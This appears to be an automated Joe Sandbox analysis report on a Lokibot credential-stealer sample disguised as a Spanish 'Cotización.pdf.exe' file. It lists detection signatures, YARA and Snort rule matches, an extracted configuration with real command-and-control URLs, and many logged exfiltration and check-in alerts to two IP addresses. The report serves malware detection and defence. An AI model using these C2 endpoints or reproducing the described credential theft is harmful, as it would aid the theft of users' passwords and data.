Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Cotizaci#U00f3n.pdf.exe

Overview

General Information

Sample Name:Cotizaci#U00f3n.pdf.exe
Analysis ID:449243
MD5:5e628ac4e53fd5b94632c03a7c43aed5
SHA1:3fb9bcd126c63af555539447b4d1ae19da45e849
SHA256:16e4415dae57c511d49d504e34ec2bb999f850b433c8bcdc071c5e629aeb8490
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://zamloki.xyz/des/co/tox.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x17cb7:$des3: 68 03 66 00 00
        • 0x1c0b4:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x1c180:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 14 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpackLoki_1Loki Payloadkevoreilly
                • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x153fc:$a2: last_compatible_version
                16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                • 0x13bff:$des3: 68 03 66 00 00
                • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                Click to see the 15 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Suspicious Double ExtensionShow sources
                Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: {path}, CommandLine: {path}, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, NewProcessName: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, OriginalFileName: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe' , ParentImage: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe, ParentProcessId: 1724, ProcessCommandLine: {path}, ProcessId: 5436

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://zamloki.xyz/des/co/tox.php"]}
                Machine Learning detection for sampleShow sources
                Source: Cotizaci#U00f3n.pdf.exeJoe Sandbox ML: detected
                Source: Cotizaci#U00f3n.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: Cotizaci#U00f3n.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,16_2_00403D74

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49725 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49725 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49725 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49726 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49726 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49726 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49727 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49727 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49727 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49728 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49728 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49728 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49729 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49729 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49729 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49730 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49731 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49732 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49732 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49732 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49733 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49733 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49733 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49734 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49734 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49734 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49735 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49735 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49735 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49736 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49736 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49736 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49738 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49738 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49738 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49739 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49739 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49739 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49740 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49740 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49740 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49741 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49741 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49741 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49742 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49751 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49751 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49751 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49752 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49752 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49752 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49753 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49753 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49753 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49761 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49762 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49763 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49763 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49763 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49764 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49764 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49764 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49765 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49765 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49765 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49766 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49766 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49766 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49767 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49767 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49767 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49768 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49768 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49768 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49769 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49769 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49769 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49775 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49775 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49775 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49776 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49776 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49776 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49777 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49777 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49777 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49778 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49778 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49778 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49779 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49779 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49779 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49780 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49780 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49780 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49781 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49781 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49781 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49782 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49782 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49782 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49783 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49783 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49783 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49784 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49784 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49784 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49785 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49785 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49785 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49786 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49786 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49786 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49787 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49787 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49787 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49788 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49788 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49788 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49789 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49789 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49789 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49790 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49790 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49790 -> 172.67.155.45:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49791 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49791 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49791 -> 104.21.6.222:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49792 -> 172.67.155.45:80
